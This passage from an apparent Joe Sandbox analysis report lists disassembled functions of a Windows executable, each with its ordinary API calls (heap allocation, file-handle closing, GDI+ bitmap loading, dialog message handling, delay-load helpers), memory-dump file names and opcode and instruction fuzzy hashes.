                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction ID: 53bc1a11a0b400598e544cb61d70ae21ab8be636dec14ebfcd9aaffcacdabc27
                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction Fuzzy Hash: A6F08C32904705DFDF30DA66C945B16B7E8EB11330F20891AE8D6C2680E778D880E792
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F35BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F35BDC
                    • Part of subcall function 00F3B07D: __EH_prolog.LIBCMT ref: 00F3B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: c10df4e0348d9ba67b8329152f477928b279df4930770ed8014f6900093b94ea
                  • Instruction ID: 99163bbd4a03b649c3cf6de7d1c27fb6872e1dede90933eece5cad5603fffb7e
                  • Opcode Fuzzy Hash: c10df4e0348d9ba67b8329152f477928b279df4930770ed8014f6900093b94ea
                  • Instruction Fuzzy Hash: 01018170E15684DAC725F7B4C8553DDFBA4AF19B10F40419DE86A53383CBB81B08E7A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F58518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: fa5cf9b1479d98a2eb7a27963e4bd0ee23708464e2035c9db2e71d0e545fe570
                  • Instruction ID: bc40c6e1b5f0c03524843447a17128116a729a3f135e59d453d3590124513b46
                  • Opcode Fuzzy Hash: fa5cf9b1479d98a2eb7a27963e4bd0ee23708464e2035c9db2e71d0e545fe570
                  • Instruction Fuzzy Hash: E1E0E525A406655AEB313A695C00B9A378C9F417F3F1C0221EF14B2090EF20CC0F75E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F396D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00F3968F,?,?,?,?,00F61FA1,000000FF), ref: 00F396EB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 4e26e55950e018982d66de432cd45e489e2c6063ab8700cd87165477866d7240
                  • Instruction ID: eff51d4f17502672ba10e5d8202cfe0a292c3d5eef8107ad99a086d36c4d836e
                  • Opcode Fuzzy Hash: 4e26e55950e018982d66de432cd45e489e2c6063ab8700cd87165477866d7240
                  • Instruction Fuzzy Hash: A3F0823095AB089FEB308A24D949792B7E49B12735F048B1ED0FB434E0D7E5688DAF00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F3A4F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: ad2da136d332713b5e47f68f8cb80cd5507498e0617d531f51fd253c76489e96
                  • Instruction ID: b5903af6a1d37dde3313ba8dc88d20dbd1e489758849c3b65c819c8a9ef71f62
                  • Opcode Fuzzy Hash: ad2da136d332713b5e47f68f8cb80cd5507498e0617d531f51fd253c76489e96
                  • Instruction Fuzzy Hash: 56F0E931409380AACA226B798C04BC6BB906F16331F04CA09F1FD02192C2B81485BB23
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                  Download Yara Rule
                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00F406B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 3e1c7579bdb08e17e156a7309f9e034856df526a8a35dd7ed8b04ac902f9f068
                  • Instruction ID: 168282592df5530387f3e0480b4ad57afa28201bdfea823f7f8c4e0f48c062ea
                  • Opcode Fuzzy Hash: 3e1c7579bdb08e17e156a7309f9e034856df526a8a35dd7ed8b04ac902f9f068
                  • Instruction Fuzzy Hash: 65D0122560416075D6213B64AC057FE3E464FC3B30F094065F90E975878E5A08CA76A6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F49D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 00F49D81
                    • Part of subcall function 00F49B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F49B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: 6fbbb4fad2c57ed859fd22860f217f8f19bbe6db3b780dc65e06dfffd1c6c4ee
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: 35D09E71B582096ADF41BA659C02A6BBFA9EB40350F108165BC4886151E9B1DA10B661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F39989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  • GetFileType.KERNELBASE(000000FF,00F39887), ref: 00F39995
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: 97d999be2aa1ab1637c605d742c8ebeed0d48d7abd5fb363f90a99074d2b41a1
                  • Instruction ID: 5f7219ecc73fffc83c70db97b79da4bb745bc4eec12a30fad7e5414bf0d3fc14
                  • Opcode Fuzzy Hash: 97d999be2aa1ab1637c605d742c8ebeed0d48d7abd5fb363f90a99074d2b41a1
                  • Instruction Fuzzy Hash: 26D01231816141A58F6147344D092997751DB8337AF38C6E8D025C40A1D7F3C803F541
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00F4D43F
                    • Part of subcall function 00F4AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4AC85
                    • Part of subcall function 00F4AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4AC96
                    • Part of subcall function 00F4AC74: IsDialogMessageW.USER32(00010428,?), ref: 00F4ACAA
                    • Part of subcall function 00F4AC74: TranslateMessage.USER32(?), ref: 00F4ACB8
                    • Part of subcall function 00F4AC74: DispatchMessageW.USER32(?), ref: 00F4ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: ae34c43c1b296d35f42d2fe9d404b127fb760a9af83d433b9534cf0a6aeadf53
                  • Instruction ID: c9b4af284db05c00300b2142578932cbe2ece5ef5097195283b73db8d9b56cb2
                  • Opcode Fuzzy Hash: ae34c43c1b296d35f42d2fe9d404b127fb760a9af83d433b9534cf0a6aeadf53
                  • Instruction Fuzzy Hash: 70D09232184300BBDA126B51CE06F0F7AA6BB98B04F004A54B349740B28AA6AD71BB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 359bf072b76687e928cb3a738c77c4b85080ead42044b2a771873a22e8ef1af1
                  • Instruction ID: 257d693b6d879bf9bb38e69a2c57bb0c15b75714d8348e93c2dbd557ce12ac14
                  • Opcode Fuzzy Hash: 359bf072b76687e928cb3a738c77c4b85080ead42044b2a771873a22e8ef1af1
                  • Instruction Fuzzy Hash: DAB012A226C0017C314C61046D16E36261CC5C1B21330401AB80DD40C2D5409D8E3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6fa0ce8492107eeb70cc79aad5f47ddc47f61852fe0727b2e891977ad9e12236
                  • Instruction ID: d94c0d99f8fd03b8f0e15dc17ba324b02191e7626f682b1045af808f01668f68
                  • Opcode Fuzzy Hash: 6fa0ce8492107eeb70cc79aad5f47ddc47f61852fe0727b2e891977ad9e12236
                  • Instruction Fuzzy Hash: 2DB012A226D0017C314C61056C16E36261CC5C1B21330401AB80DD40D2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 512ce0465e87f1dc6a950ee66d70d02c25cdc8f4f469a9b36dd59c409761790a
                  • Instruction ID: 2144d78ad7f36a398ab4d9e6d9a0b1ec12dc308065b36f9204253fe9bfe554e2
                  • Opcode Fuzzy Hash: 512ce0465e87f1dc6a950ee66d70d02c25cdc8f4f469a9b36dd59c409761790a
                  • Instruction Fuzzy Hash: 45B012A226C1017C318861046C16E36261CC5C1B21330411BB80DD40C2D5409CC93432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5ef8c068f2eec7912942bab4b6d38cf8fa100c1fc7abbf1cd5763ab93404e54a
                  • Instruction ID: ef0d309de4cbf65151f8804fc887d7da87cc75a35c63323469b0a695fe5a4ad2
                  • Opcode Fuzzy Hash: 5ef8c068f2eec7912942bab4b6d38cf8fa100c1fc7abbf1cd5763ab93404e54a
                  • Instruction Fuzzy Hash: EFB012A226C0017C314861046C16E36261CC5C2B21330801ABC0DD40C2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0eebea2ed98a728fdea4c652e07237985e1856b82e305eab6235e597a421f3f9
                  • Instruction ID: e64f3dd18f13bbf6dfa569eefa1c22171d991c1913ee715ffa9c39a744deeb7a
                  • Opcode Fuzzy Hash: 0eebea2ed98a728fdea4c652e07237985e1856b82e305eab6235e597a421f3f9
                  • Instruction Fuzzy Hash: CAB0129226C1017C318861046C16E36261CC5C1B21330815BB809D41C2D5409CCE3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 168a5c421f863731bd1a929dc5f8718144399d37382c0fee216b98af1ac34182
                  • Instruction ID: 6d3c8cc08deb6c83ad37b549959508a4008eea5da80ae1912143785570fd70b2
                  • Opcode Fuzzy Hash: 168a5c421f863731bd1a929dc5f8718144399d37382c0fee216b98af1ac34182
                  • Instruction Fuzzy Hash: D1B0129226C0017C314C61046D16E36261CC5C1B21330805AB809D41C2D5419C8F3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 32c0add2c67d6316f7acee5e3816dedf08981b20e1a6ea27235e60a666f388a1
                  • Instruction ID: e9c1f6e6add16f5875d0f2ca3d734fe8f082d4af6d6f4ed3ed84a2d9c3cbd6be
                  • Opcode Fuzzy Hash: 32c0add2c67d6316f7acee5e3816dedf08981b20e1a6ea27235e60a666f388a1
                  • Instruction Fuzzy Hash: 6EB0129226C0017C314861046C16E36261CC5C2B21330C05ABC09D41C2D5409C8E3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
